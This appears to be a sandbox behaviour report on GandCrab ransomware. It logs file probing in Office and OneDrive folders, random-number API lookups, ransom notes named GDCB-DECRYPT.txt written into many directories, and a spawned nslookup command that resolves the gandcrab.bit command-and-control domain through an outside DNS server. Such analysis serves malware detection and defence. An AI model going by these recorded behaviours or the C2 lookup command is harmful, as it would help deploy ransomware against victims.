Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\onenote.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\onenote.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\outlook.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\outlook.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\powerpnt.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\powerpnt.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\setup.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\setup.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\setup64.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\setup64.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\visio.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\visio.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\WebServiceCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\Wef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\Wef\AppCommands\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\winproj.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\winproj.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\winword.exe_Rules.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\winword.exe_Rules.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\AutoPlayLogo.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\AutoPlayLogo.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\AutoPlayOptIn.gif, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\AutoPlayOptIn.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\AutoPlayOptIn.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\AutoPlayOptIn.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\ExclusionList.xml, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\ExclusionList.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\is\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\it\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626\ja\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.5892.0626_1\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\af\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\alertIcon.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\alertIcon.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\am-et\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\amd64\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\AppBlue.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\17.3.6917.0607\AppBlue.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
For performance reasons, the remaining 16792 entries are omitted.
The remaining entries can be found in glog.xml.
Process #16: nslookup.exe
(Host: 8, Network: 18)
+
Information Value
ID #16
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup gandcrab.bit a.dnspod.com
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:43, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:07:43
OS Process Information
+
Information Value
PID 0xaa8
Parent PID 0xa5c (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AB4
0x A74
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x00000000002e0000 0x002e0000 0x002fffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000002e0000 0x002e0000 0x002effff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x00000000002f0000 0x002f0000 0x002f3fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000300000 0x00300000 0x00301fff Private Memory Readable, Writable True False False
  • Region Actions
nslookup.exe.mui 0x00300000 0x00304fff Memory Mapped File Readable False False False
  • Region Actions
nslookup.exe 0x00310000 0x00326fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000330000 0x00330000 0x0432ffff Pagefile Backed Memory - True False False
  • Region Actions
pagefile_0x0000000004330000 0x04330000 0x04343fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004350000 0x04350000 0x0438ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004390000 0x04390000 0x043cffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000043d0000 0x043d0000 0x043d3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000043e0000 0x043e0000 0x043e0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000043f0000 0x043f0000 0x043f1fff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x04400000 0x044bdfff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000044c0000 0x044c0000 0x044fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004500000 0x04500000 0x04500fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004510000 0x04510000 0x04510fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004520000 0x04520000 0x0452ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004530000 0x04530000 0x0456ffff Private Memory Readable, Writable True False False
  • Region Actions
imm32.dll 0x04570000 0x04599fff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000045e0000 0x045e0000 0x046dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004820000 0x04820000 0x0482ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004830000 0x04830000 0x049b7fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000049c0000 0x049c0000 0x04b40fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000004b50000 0x04b50000 0x05f4ffff Pagefile Backed Memory Readable True False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winrnr.dll 0x73e00000 0x73e0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nlaapi.dll 0x73e10000 0x73e22fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x73e30000 0x73e45fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dnsapi.dll 0x73e50000 0x73ed3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x73f10000 0x73f2afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x73ff0000 0x74001fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x74010000 0x74017fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x74020000 0x74065fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x74070000 0x740bdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x74170000 0x74177fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x74180000 0x741affff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x74f40000 0x74f46fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75500000 0x7555bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x000000007f1e0000 0x7f1e0000 0x7f2dffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007f2e0000 0x7f2e0000 0x7f302fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f308000 0x7f308000 0x7f308fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f309000 0x7f309000 0x7f309fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f30a000 0x7f30a000 0x7f30cfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f30d000 0x7f30d000 0x7f30ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7df9ee76ffff Private Memory Readable True False False
  • Region Actions
pagefile_0x00007df9ee770000 0x7df9ee770000 0x7ff9ee76ffff Pagefile Backed Memory - True False False
  • Region Actions
